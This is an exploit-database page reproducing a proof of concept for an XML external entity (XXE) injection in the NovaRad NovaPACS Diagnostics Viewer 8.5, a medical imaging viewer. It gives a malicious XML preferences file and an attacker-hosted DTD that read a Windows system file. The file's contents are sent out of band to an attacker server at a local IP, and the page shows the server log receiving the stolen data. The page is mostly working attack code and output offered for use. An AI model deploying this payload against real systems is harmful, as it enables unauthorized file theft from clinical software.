Novarad novapacs diagnostics viewer 8.5 xml external entity injection (file disclosure) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-09-06 | Type : webapps | Platform : xml
This exploit / vulnerability Novarad novapacs diagnostics viewer 8.5 xml external entity injection (file disclosure) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Title: NovaRad NovaPACS Diagnostics Viewer 8.5 - XML External Entity Injection (File Disclosure)
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Date: 2018-09-07
# Vendor: NovaRad Corporation
# Product web page: https://www.novarad.net
# Affected version: 8.5.19.75 (Diagnostics Viewer, Study Browser)
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
# Advisory ID: ZSL-2018-5488
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5488.php
# CVE: N/A

# Desc: NovaPACS suffers from an unauthenticated XML External Entity
# (XXE) injection vulnerability using the DTD parameter entities technique
# resulting in disclosure and retrieval of arbitrary data from the affected
# node via out-of-band (OOB) channel attack. The vulnerability is triggered
# when importing XML format preferences within the settings submenu.

# PoC
# Malicious.xml:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ZSL [
<!ENTITY % remote SYSTEM "http://10.0.1.230:8080/xxe.xml">
%remote;
%root;
%oob;]>

# Attacker's xxe.xml:

<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://10.0.1.230:8080/?%payload;'> ">

Data retrieval:

lqwrm@metalgear:~$ python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
10.0.1.230 - - [28/Aug/2018 16:27:48] "GET /xxe.xml HTTP/1.1" 200 -
10.0.1.230 - - [28/Aug/2018 16:27:48] "GET /?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1%0D%0A[MCI%20Extensions.BAK]%0D%0A3g2=MPEGVideo%0D%0A3gp=MPEGVideo%0D%0A3gp2=MPEGVideo%0D%0A3gpp=MPEGVideo%0D%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo%0D%0Amod=MPEGVideo%0D%0Amov=MPEGVideo%0D%0Amp4=MPEGVideo%0D%0Amp4v=MPEGVideo%0D%0Amts=MPEGVideo%0D%0Ats=MPEGVideo%0D%0Atts=MPEGVideo%0D%0A[FIX%20DMACS]%0D%0AMinAfterStartup=0 HTTP/1.1" 200 -

Novarad novapacs diagnostics viewer 8.5 xml external entity injection (file disclosure)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Novarad novapacs diagnostics viewer 8.5 xml external entity injection (file disclosure) Vulnerability / Exploit